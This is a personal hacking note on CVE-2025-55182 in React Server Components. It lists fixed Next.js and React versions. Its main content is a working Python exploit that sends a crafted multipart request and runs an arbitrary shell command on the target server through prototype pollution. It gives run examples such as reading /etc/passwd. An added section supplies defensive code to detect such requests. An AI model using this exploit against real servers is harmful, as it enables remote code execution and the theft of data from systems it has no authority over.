CVE-2025-55182_react_server_component


path: personal/hacking/CVE/CVE-2025-55182_react_server_component.md

- **fileName**: CVE-2025-55182_react_server_component
- **Created on**: 2025-12-09 15:45:30

This CVE is a bug in React's RSC (React Server Components).
How it works: it is a bug in the serialization of values passed to
Server Functions.

out of scope

Fixed Versions

The vulnerability is fully resolved in the following patched Next.js releases:

- 15.0.5
- 15.1.9
- 15.2.6
- 15.3.6
- 15.4.8
- 15.5.7
- 16.0.7

On React: 19.0.1, 19.1.2, 19.2.1 ... and every version above these is safe.

This is the repo that has the explanation for this:
the chad

The main script for the vuln:

```python
# /// script
# dependencies = ["requests"]
# ///
import requests
import sys
import json

# change to target
BASE_URL = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:3000"
EXECUTABLE = sys.argv[2] if len(sys.argv) > 2 else "id"

crafted_chunk = {
    "then": "$1:__proto__:then",
    "status": "resolved_model",
    "reason": -1,
    "value": '{"then": "$B0"}',
    "_response": {
        "_prefix": f"var res = process.mainModule.require('child_process').execSync('{EXECUTABLE}',{{'timeout':5000}}).toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`${{res}}`}});",
        # If you don't need the command output, you can use this line instead:
        # "_prefix": f"process.mainModule.require('child_process').execSync('{EXECUTABLE}');",
        "_formData": {
            "get": "$1:constructor:constructor",
        },
    },
}

files = {
    "0": (None, json.dumps(crafted_chunk)),
    "1": (None, '"$@0"'),
}

headers = {"Next-Action": "x"}
res = requests.post(BASE_URL, files=files, headers=headers, timeout=10)
print(res.status_code)
print(res.text)


# How to run it:
# python3 poc.py {URL} {command}
# python3 poc.py http://localhost:3000 'cat /etc/passwd'
```
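An added detection example, not part of the original note and not React or Next.js code: it parses a multipart request that carries a `Next-Action` header, as the script above sends, and flags `$`-prefixed reference strings whose path reaches `__proto__` or `constructor`. The function names, the segment list and the sample requests are assumptions constructed for illustration, and the samples leave out the `_prefix` payload.

```python
import json
from email.parser import BytesParser

# Assumed marker list: the path segments used by the "$<id>:<key>:..." references above.
SUSPICIOUS_SEGMENTS = {"__proto__", "constructor"}

def iter_strings(value):
    """Yield every string in a decoded JSON value, descending into JSON-in-strings."""
    if isinstance(value, str):
        yield value
        try:
            value = json.loads(value)  # e.g. the "value" field holds JSON text
        except (ValueError, RecursionError):
            return
    if isinstance(value, dict):
        value = list(value) + list(value.values())
    if isinstance(value, list):
        for item in value:
            yield from iter_strings(item)

def find_hits(headers, body):
    """Return sorted (field, reference) pairs worth alerting on."""
    lowered = {k.lower(): v for k, v in headers.items()}
    ctype = lowered.get("content-type", "")
    if "next-action" not in lowered or not ctype.lower().startswith("multipart/form-data"):
        return []
    msg = BytesParser().parsebytes(b"Content-Type: " + ctype.encode() + b"\r\n\r\n" + body)
    hits = set()
    for part in (p for p in msg.walk() if not p.is_multipart()):
        name = part.get_param("name", header="content-disposition") or ""
        try:
            # Match on decoded JSON so \u005f-style escapes cannot hide a segment.
            decoded = json.loads(part.get_payload(decode=True))
        except (ValueError, RecursionError):
            continue
        for text in iter_strings(decoded):
            if text.startswith("$") and SUSPICIOUS_SEGMENTS & set(text.split(":")[1:]):
                hits.add((name, text))
    return sorted(hits)

# Constructed samples: reference strings copied from the script above, no _prefix code.
def multipart(fields, boundary="sample"):
    parts = [f'--{boundary}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'
             for n, v in fields.items()]
    return ("".join(parts) + f"--{boundary}--\r\n").encode()

HEADERS = {"Next-Action": "x", "Content-Type": "multipart/form-data; boundary=sample"}
SUSPECT = {"0": json.dumps({"then": "$1:__proto__:then", "status": "resolved_model",
                            "_response": {"_formData": {"get": "$1:constructor:constructor"}}}),
           "1": '"$@0"'}
BENIGN = {"0": json.dumps({"title": "constructor", "ref": "$1:title"}), "1": '"hello"'}
```

A hit is a heuristic signal for triage, not proof of exploitation; upgrading to the fixed versions listed above remains the actual remediation.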
